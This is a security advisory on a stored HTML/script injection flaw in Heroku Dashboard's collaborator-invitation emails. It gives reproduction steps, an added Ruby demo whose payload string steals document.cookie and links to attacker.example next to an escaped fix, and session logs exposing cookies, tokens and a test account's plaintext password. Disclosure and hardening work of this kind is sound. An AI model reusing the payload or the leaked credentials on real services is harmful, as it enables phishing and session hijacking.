Document Title:
===============
Heroku API Bug Bounty #1 - Persistent Invitation Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1300

Video: http://www.vulnerability-lab.com/get_content.php?id=1335

BugCrowd ID: e8a8ecb81b9bf115226ed2ff05937a0424da101610ba1289f027a1f8319d4eb9

Acknowledgement (Hall of Fame): https://bugcrowd.com/heroku/hall-of-fame

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/01/09/heroku-bug-bounty-program-2015-persistent-invitation-vulnerability

Release Date:
=============
2015-01-09

Vulnerability Laboratory ID (VL-ID):
====================================
1300

Common Vulnerability Scoring System:
====================================
4.1

Product & Service Introduction:
===============================
Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity. Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling. Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins.
(Copy of the Vendor Homepage: https://www.heroku.com/home )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent mail encoding web vulnerability in the official Heroku Dashboard web application (API).

Vulnerability Disclosure Timeline:
==================================
2014-08-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-08-27: Vendor Notification (Heroku Security Team - Bug Bounty Program)
2014-12-03: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program)
2015-01-08: Vendor Fix/Patch Notification (Heroku Developer Team - Reward: Bug Bounty)
2015-01-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Heroku
Product: Heroku Dashboard - Web Application (API) 2014 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official Heroku Dashboard web application (API). The application-side issue allows remote attackers to inject their own persistent malicious content into emails sent by the service.

The vulnerability is located in the invite module of the Heroku Dashboard. The attacker registers an account with a script code payload as first and last name. The Heroku online service then reproduces this name value, without secure encoding, inside the invitation mailing. After registration the attacker opens the access page of one of their own apps (https://dashboard.heroku.com/apps/asdsad/access) and can add any email address as a collaborator; the "invitation to collaborate" request then delivers the attacker's script code to that address. The request method used to inject the code during registration in the app service is POST.
The exploitation takes place once the attacker has added another, remote email address: the unencoded profile context is streamed into the outgoing emails of the Heroku online service through the invitation to collaborate. The profile values stored in the database are parsed straight into the outgoing mail. Because the dashboard access service does not encode this database context in the invitation-to-collaborate mail, the application-side issue is exploitable. The bug type has been declared as a persistent mail encoding web vulnerability in the Heroku web service, in connection with the vulnerable application module/function. The sender of the mail is the main Heroku reply address, so the injected content arrives from a trusted origin. The bug execution occurs in the API validation of the form that is used to invite other email contacts. The Heroku Dashboard beta has the same bug in the same module/function, because only the frontend was changed during the update.

The security risk of the persistent mail encoding web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 4.1. Exploitation of the persistent vulnerability in the `invitation to collaborate` module requires a low privileged Heroku account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external sources and persistent manipulation of affected or connected module context. Note that most mail clients do not execute script in message bodies, so the practical impact is primarily injected HTML and links arriving from a trusted Heroku sender address (phishing); script execution depends on how the recipient's client or webmail renders the message.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Heroku Dashboard > Apps > User[x] > Access
[+] Heroku Dashboard Beta > Apps > User[x] > Access

Vulnerable Function(s):
[+] Invitation to Collaborate
[+] Invitation

Affected Module(s):
[+] API

Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with a low privileged application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability, follow the information and steps below.

Manual steps to reproduce the security vulnerability ...

1. Register an account with a script code payload in the first- & last-name input fields
2. Save the context and log in to the account
3. Register a new random app inside the dashboard
4. Switch to the Apps > Access section in the regular dashboard or via the beta template
5. Add any random email address or Heroku user account email to the access rules and save the context
   Note: A notification mail arrives in the inbox of the newly added access user
6. The payload executes in the mail body context because of the payload stored in the user profile values
7. Successful reproduction of the persistent web vulnerability!

PenTest Account:
bkm@evolution-sec.com
User Password: chaos666

PoC: Mail Header > Source

----==_mimepart_53fe30f6c9dbf_79c5a2a6ac74767
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

">%20%20>"
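The following Ruby example is added here by the editor; it is not code from the advisory and not Heroku's code. It models the mechanism the steps above describe: a collaborator display name taken from the first/last name profile fields is interpolated into the invitation mail body. The vulnerable template mirrors the behaviour the advisory reports (the stored value is reproduced without encoding), the hardened template shows the output encoding that closes the issue, and a small allowlist check shows the defence-in-depth control at the registration form. The advisory only shows the text/plain MIME part of the message; the example assumes the invitation also carries a text/html part rendered from the same profile values. The payload string, the template wording and the app name are constructed sample input.

```ruby
require 'erb'

# Constructed sample input (not taken from the advisory): a display name
# built from the attacker-controlled first/last name profile fields.
EVIL_NAME = %q{Bob"><script>alert(document.cookie)</script><a href="https://attacker.example/">}
APP_NAME  = 'asdsad' # app name used in the advisory's PoC request

# Vulnerable pattern: plain ERB performs no escaping, so the stored
# profile value lands verbatim in the text/html part of the invitation.
VULN_TEMPLATE = '<p><%= @inviter %> has invited you to collaborate on ' \
                'the app <b><%= @app %></b>.</p>'

# Hardened pattern: every untrusted value is HTML-escaped at the point it
# is inserted into markup (ERB::Util#h wraps CGI.escapeHTML).
SAFE_TEMPLATE = '<p><%= h(@inviter) %> has invited you to collaborate on ' \
                'the app <b><%= h(@app) %></b>.</p>'

# Renders an invitation body from a template with the given values.
class InviteMail
  include ERB::Util # provides h()

  def initialize(inviter, app)
    @inviter = inviter
    @app = app
  end

  def render(template)
    ERB.new(template).result(binding)
  end
end

def render_invite_vulnerable(inviter, app)
  InviteMail.new(inviter, app).render(VULN_TEMPLATE)
end

def render_invite_hardened(inviter, app)
  InviteMail.new(inviter, app).render(SAFE_TEMPLATE)
end

# Regression check for the mail builder: the raw untrusted value must
# never appear unchanged in the rendered HTML body.
def markup_injected?(body, untrusted)
  body.include?(untrusted)
end

# Defence in depth at the registration form: a display name has no
# business containing angle brackets or quotes, so reject them up front.
# Output encoding (above) remains the primary control; this only narrows
# what can be stored in the first place.
NAME_PATTERN = /\A[\p{L}\p{M}\s'.\-]{1,64}\z/

def acceptable_display_name?(name)
  NAME_PATTERN.match?(name)
end

if __FILE__ == $PROGRAM_NAME
  puts render_invite_vulnerable(EVIL_NAME, APP_NAME)
  puts render_invite_hardened(EVIL_NAME, APP_NAME)
  puts acceptable_display_name?(EVIL_NAME) # false
end
```

Run it with `ruby invite_mail.rb`: the first line printed contains the live `<script>` and anchor tags, the second prints them as `&lt;script&gt;` entities that a mail client shows as text. A mail template that builds HTML from profile fields should be covered by a test like `markup_injected?` so that a later template change cannot silently reintroduce the raw value.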

--- PoC Session Logs [POST] [Invite to Collaborate] (Notification API) ---

21:26:26.784 [414ms] [total 414ms]  Status: 302 [Found]
POST https://dashboard.heroku.com/apps/asdsad/access
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI]  Content size[-1]  Mime Type[text/html]

Request Header:
Host[dashboard.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dashboard.heroku.com/apps/asdsad/access]
Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409166519.1; __utmb=148535982.57.10.1409166519; __utmc=148535982; __utmz=148535982.1409166519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles%2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _my-heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFVSjJjTnVhQ1MxN09nTFJ6YVYzay9lY0NRQXZaZ1FIZ0xrR2l2ZHFpcHVnPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWM3MGU4YjlmYjk4MTc0Y2I5NjMxOTU4MmRiZGFkNDE1BjsAVEkiC2luX29yZwY7AEZG--19be2343ca827f40ab20fc07e7093201c381af2c; user_session_secret=BAhJIgKiBUx6RmhVbmdyV0hRd1FTOHZaMEpsVEdaWVRFUnRNSEpwTXpOdVpISkxMMjkxZFRSeUwyMUpUa2gzVm04eGJtODNPV0V6YjNoSE9FUlZjV1pCTkdZd2JHOVVjVlpOUmtzM2JEZFdlVlU0YkZoMVpHSktXbXBaTUZoTFVIZExSMWx5TUhaamFtOHhWbUZ3YVdaalVXSnhUREZRVjJVMk5IZERaMnczVlRoNE9FOTJWbE5WYldONU9XWXhlVU5LVldKU1FqZElhR1IxU25JelJVWm5XVVJ3WmxaTGNsRXZSaXR3VjBGR1RGVlFSMHBWZURoclVWTXZlVGc1YVdGdFFscDFPRkZ2UkVrMmNXdzFNRTVSWWtkWU5YSTBSSGRvUlRGWFUxQm9NMnQzTDNwd2NXTm5WakEwZURWd1IybHRablZtT0RFM2NIRjJTVlJZU2s1V2FtcHpXWHBqVXpsTU5FeDVlV1pqV1V4cGFXbFRVVGN4UlRkdFNFNVVaRzk1TkRkVVJrWjVZV2RJU0VnNGQwdDNNa2xIY21RclNVNXBTRTR3TVVsMlJuaElSRXh6VEZSMFNTOU9WVU5UUVRZd2MxbGpNSE5NY0c1c05XVktZMG8xVlhKRE9Fc3diSFJCYW1FeFJuaDZhRVJLWWtaa1FtMW5NM2x0YlZneWJFVkNPVU5aVjJSeGEzRnlSbGRoVjBoMWIxZDNTWGhyWjNreWFEVlpWblJPZEZKT1NtSTRjVlJDT1dvMFEyWXZVMUU0VVdWQmEzZENUVmRoWmpsV2NGVkxiVkl3ZVU5SlVHRmpZa2hLTDJKRlVYcHVWV3R5ZFhacFJsUXZabUY2VTBFeFQxTlFRamxUTVVkblJqZDRlRFpUZHpOcGFXeHplamxsTm1JM1ZWaFdkbk5UVTBJdmEyUkxWM2hRYzJkWFlpdHRWR2RqTlRFelpYaHRiVXczVUhSc1luaHphRXh1T1UxeGFWWlZhV3hGVEdObWRtVmpMMHBKTm5oSE5rbHpibFV3VnpaS1FtSkVTWFpuTTNOaVZFSXZkVEJyYzNGUWNIQjZObHBvYUUxd2NuQnJaa0ZFWnpaQlVXMWFZVFZHV1RWaWJsUlpZa3BaYkdOc2FWQmlTWFYzTVRKVVVFVnNXSGRFYTBZNWNHRnFObkV5TjJkSldITm5jVlkxWjJoMlRGUTRWU3RaUVU4MFEzWmpUbEZsUlU5VE4waGxiVGh5TWtvelYyOURVM1J3ZGpONlRuWmpNU3RRWkZWSllqWkVXa3RTY1c1Rk1XcFViemx6Ym5ObE5rOWpTRlIzTW01TVJIcGxabTF5V2pWemFuQnRUek5CYlRoT1prbHFaMlJOUldsVVkxWldSVFJLYVU1ak1GVldUSGxVVTNsa1VXbFRVRmh6V1VFNGVXeGxTVzh2UldrcmNpdEhWemhzVjFoTVRtdzNkMGxHUWtkb2MwRk5kazE2UVRaUksySm5hMHhzU1daYWFuaE9SbXhrTUZWU1NuVkdWWEpHUkhORVZYcDBTaXRaYTB0aU5HaHpjVm9yVTFSSmNXWmFTR3g1VTBWM1lraFROa1ZrVkhWclRUSXpRM3BFTjNCWlNraHlaMGh1VlRKRWJsWnRRelU0VTNkeFpXdDFOWFphTkZZdlZqUkViRXBSYUhCUWFtRm9ZelZRYUhOV1RYSjRVWGRyYm5RNVNXbFVSak5PUkcxV1EwNVJWR3haYm5OeVlWSmFSbFZ4VWs1RFpHTXhaVVZwTldWUlVFOXJURmhFUnpocFIzbFpUMkpCVVZSSlVFWnhTMDlOZG1NclMwTndLekUwWmkwdFp6Sk5Zamg0TWxWVU1rUTVNVXRMVURoYWFWSldkejA5LS0yN2FiYTY5MmM1MmQxYjgxMTk0NTRjNmQyM2Q4Y2Q2YTM1YTJiZGNkBjoGRUY%3D--1a29e7f4569b51d2db15f168457ce65b8c627b9c; dashboard_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _ga=GA1.3.1421671373.1409166519; __utma=155166509.1421671373.1409166519.1409166827.1409166827.1; __utmb=155166509.9.10.1409166827; __utmc=155166509; __utmz=155166509.1409166827.1.1.utmcsr=devcenter.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/articles/dynos; visitor_id36622=271240760; flash=%7B%7D]
Connection[keep-alive]

POST data:
utf8[%E2%9C%93]
authenticity_token[UJ2cNuaCS17OgLRzaV3k%2FecCQAvZgQHgLkGivdqipug%3D]
user%5Bemail%5D[bkm%40evolution-sec.com]
commit[Invite]

Response Header:
Cache-Control[no-cache, no-store, must-revalidate]
Content-Type[text/html; charset=utf-8]
Date[Wed, 27 Aug 2014 19:26:46 GMT]
Expires[0]
Location[https://dashboard.heroku.com/apps/asdsad/access]
Pragma[no-cache]
Request-Id[63991fba-fbb1-492d-8b22-866fa6111cb9]
Server[nginx/1.5.7]
Set-Cookie[flash=%7B%22notice%22%3A%22bkm%40evolution-sec.com+has+been+added+to+the+app+asdsad.%22%7D; domain=dashboard.heroku.com; path=/; secure]
status[302 Found]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-Rack-Cache[invalidate, pass]
X-Request-Id[63991fba-fbb1-492d-8b22-866fa6111cb9]
x-runtime[0.230753]
x-ua-compatible[IE=Edge,chrome=1]
Transfer-Encoding[chunked]
Connection[keep-alive]

-
21:26:27.201 [474ms] [total 1293ms]  Status: 200 [OK]
GET https://dashboard.heroku.com/apps/asdsad/access
Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI]  Content size[13369]  Mime Type[text/html]

Request Header:
Host[dashboard.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dashboard.heroku.com/apps/asdsad/access]
Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409166519.1; __utmb=148535982.57.10.1409166519; __utmc=148535982; __utmz=148535982.1409166519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles%2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _my-heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFVSjJjTnVhQ1MxN09nTFJ6YVYzay9lY0NRQXZaZ1FIZ0xrR2l2ZHFpcHVnPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWM3MGU4YjlmYjk4MTc0Y2I5NjMxOTU4MmRiZGFkNDE1BjsAVEkiC2luX29yZwY7AEZG--19be2343ca827f40ab20fc07e7093201c381af2c; user_session_secret=BAhJIgKiBUx6RmhVbmdyV0hRd1FTOHZaMEpsVEdaWVRFUnRNSEpwTXpOdVpISkxMMjkxZFRSeUwyMUpUa2gzVm04eGJtODNPV0V6YjNoSE9FUlZjV1pCTkdZd2JHOVVjVlpOUmtzM2JEZFdlVlU0YkZoMVpHSktXbXBaTUZoTFVIZExSMWx5TUhaamFtOHhWbUZ3YVdaalVXSnhUREZRVjJVMk5IZERaMnczVlRoNE9FOTJWbE5WYldONU9XWXhlVU5LVldKU1FqZElhR1IxU25JelJVWm5XVVJ3WmxaTGNsRXZSaXR3VjBGR1RGVlFSMHBWZURoclVWTXZlVGc1YVdGdFFscDFPRkZ2UkVrMmNXdzFNRTVSWWtkWU5YSTBSSGRvUlRGWFUxQm9NMnQzTDNwd2NXTm5WakEwZURWd1IybHRablZtT0RFM2NIRjJTVlJZU2s1V2FtcHpXWHBqVXpsTU5FeDVlV1pqV1V4cGFXbFRVVGN4UlRkdFNFNVVaRzk1TkRkVVJrWjVZV2RJU0VnNGQwdDNNa2xIY21RclNVNXBTRTR3TVVsMlJuaElSRXh6VEZSMFNTOU9WVU5UUVRZd2MxbGpNSE5NY0c1c05XVktZMG8xVlhKRE9Fc3diSFJCYW1FeFJuaDZhRVJLWWtaa1FtMW5NM2x0YlZneWJFVkNPVU5aVjJSeGEzRnlSbGRoVjBoMWIxZDNTWGhyWjNreWFEVlpWblJPZEZKT1NtSTRjVlJDT1dvMFEyWXZVMUU0VVdWQmEzZENUVmRoWmpsV2NGVkxiVkl3ZVU5SlVHRmpZa2hLTDJKRlVYcHVWV3R5ZFhacFJsUXZabUY2VTBFeFQxTlFRamxUTVVkblJqZDRlRFpUZHpOcGFXeHplamxsTm1JM1ZWaFdkbk5UVTBJdmEyUkxWM2hRYzJkWFlpdHRWR2RqTlRFelpYaHRiVXczVUhSc1luaHphRXh1T1UxeGFWWlZhV3hGVEdObWRtVmpMMHBKTm5oSE5rbHpibFV3VnpaS1FtSkVTWFpuTTNOaVZFSXZkVEJyYzNGUWNIQjZObHBvYUUxd2NuQnJaa0ZFWnpaQlVXMWFZVFZHV1RWaWJsUlpZa3BaYkdOc2FWQmlTWFYzTVRKVVVFVnNXSGRFYTBZNWNHRnFObkV5TjJkSldITm5jVlkxWjJoMlRGUTRWU3RaUVU4MFEzWmpUbEZsUlU5VE4waGxiVGh5TWtvelYyOURVM1J3ZGpONlRuWmpNU3RRWkZWSllqWkVXa3RTY1c1Rk1XcFViemx6Ym5ObE5rOWpTRlIzTW01TVJIcGxabTF5V2pWemFuQnRUek5CYlRoT1prbHFaMlJOUldsVVkxWldSVFJLYVU1ak1GVldUSGxVVTNsa1VXbFRVRmh6V1VFNGVXeGxTVzh2UldrcmNpdEhWemhzVjFoTVRtdzNkMGxHUWtkb2MwRk5kazE2UVRaUksySm5hMHhzU1daYWFuaE9SbXhrTUZWU1NuVkdWWEpHUkhORVZYcDBTaXRaYTB0aU5HaHpjVm9yVTFSSmNXWmFTR3g1VTBWM1lraFROa1ZrVkhWclRUSXpRM3BFTjNCWlNraHlaMGh1VlRKRWJsWnRRelU0VTNkeFpXdDFOWFphTkZZdlZqUkViRXBSYUhCUWFtRm9ZelZRYUhOV1RYSjRVWGRyYm5RNVNXbFVSak5PUkcxV1EwNVJWR3haYm5OeVlWSmFSbFZ4VWs1RFpHTXhaVVZwTldWUlVFOXJURmhFUnpocFIzbFpUMkpCVVZSSlVFWnhTMDlOZG1NclMwTndLekUwWmkwdFp6Sk5Zamg0TWxWVU1rUTVNVXRMVURoYWFWSldkejA5LS0yN2FiYTY5MmM1MmQxYjgxMTk0NTRjNmQyM2Q4Y2Q2YTM1YTJiZGNkBjoGRUY%3D--1a29e7f4569b51d2db15f168457ce65b8c627b9c; dashboard_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _ga=GA1.3.1421671373.1409166519; __utma=155166509.1421671373.1409166519.1409166827.1409166827.1; __utmb=155166509.9.10.1409166827; __utmc=155166509; __utmz=155166509.1409166827.1.1.utmcsr=devcenter.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/articles/dynos; visitor_id36622=271240760; flash=%7B%22notice%22%3A%22bkm%40evolution-sec.com+has+been+added+to+the+app+asdsad.%22%7D]
Connection[keep-alive]

Response Header:
Cache-Control[must-revalidate, no-cache, no-store, private]
Content-Type[text/html; charset=utf-8]
Date[Wed, 27 Aug 2014 19:26:47 GMT]
Expires[0]
Pragma[no-cache]
Request-Id[843d1f47-560b-4a1d-881c-fb1ec07968b9]
Server[nginx/1.5.7]
status[200 OK]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-Rack-Cache[miss]
X-Request-Id[843d1f47-560b-4a1d-881c-fb1ec07968b9]
x-runtime[0.287221]
x-ua-compatible[IE=Edge,chrome=1]
Content-Length[13369]
Connection[keep-alive]


PoC: Invite via Dashboard Beta through Heroku API

heroku

">%20%20>"